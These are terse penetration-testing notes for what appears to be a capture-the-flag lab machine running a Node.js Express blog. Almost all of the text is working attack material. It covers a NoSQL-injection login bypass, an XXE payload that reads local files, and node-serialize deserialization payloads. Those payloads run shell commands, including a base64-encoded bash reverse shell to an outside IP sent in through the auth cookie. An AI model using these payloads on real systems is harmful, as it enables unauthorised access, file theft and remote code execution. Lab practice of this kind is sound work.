10.10.11.139
ttl 63

[+]nmap[+]
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA)
|   256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA)
|_  256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519)
5000/tcp open  http    Node.js (Express middleware)
|_http-title: Blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

[+]Authentication Bypass[+]
http://10.10.11.139:5000/login
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection

Basic authentication bypass using not equal ($ne) or greater ($gt)
Original Payload : {"username": {"$ne": null}, "password": {"$ne": null}}
noSQL injection >> 
                  IN JSON >> 
                             BURPSUITE >> 
                                         Content-Type: application/json
                                         {"user":"admin", "password": { "$ne":"hello" }}
                                         
http://10.10.11.139:5000/login
New Article
Upload

[+]XXE[+] 
https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity

Upload xxe-rce.xml >>
<!--?xml version="1.0" ?-->
<!DOCTYPE body [<!ENTITY example SYSTEM "/home/admin/user.txt"> ]>
<body>
        <markdown>&example;</markdown>
</body>

Response : /etc/passwd

[+]NODE SERIALISE[+]
https://book.hacktricks.xyz/pentesting-web/deserialization

Payload Ping Comprobation Conectivity {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ping -c 2 $IP', function(error, stdout, stderr) { console.log(stdout) })}"}
Url encode all characters if not work at first ...

[+]SERIALISE EXPLOIT[+]
Cookie Session Url decode >> {"user":"admin","sign":"23e112072945418601deb47d9a6c7de8"}
Cookie Payload >> Cookie: auth= (URL_ENCODE_ALL_CHARACTERS) >> {"user":"admin","sign":"23e112072945418601deb47d9a6c7de8","rce":"_$$ND_FUNC$$_function(){ require('child_process').exec(\"nc 10.10.14.51 4444\", function(error, stdout, stderr) { console.log(stdout) }); }()"}
Revershell >> echo -n 'bash -i  >& /dev/tcp/10.10.14.51/4444 0>&1'| base64
YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNTEvNDQ0NCAwPiYx

Cookies Payload ReverShell >> (URL_ENCODE_ALL_CHARACTERS) >> {"user":"admin","sign":"23e112072945418601deb47d9a6c7de8","rce":"_$$ND_FUNC$$_function(){ require("child_process").exec(\"echo -n YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNTEvOTAwMSAwPiYx | base64 -d | bash\", function(error, stdout, stderr) { console.log(stdout) }); }()"}
{"user":"admin","sign":"23e112072945418601deb47d9a6c7de8","rce":"_$$ND_FUNC$$_function(){ require("child_process").exec(\"echo -n YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNTEvOTAwMSAgMD4mMQ== | base64 -d | bash\", function(error, stdout, stderr) { console.log(stdout) }); }()"}

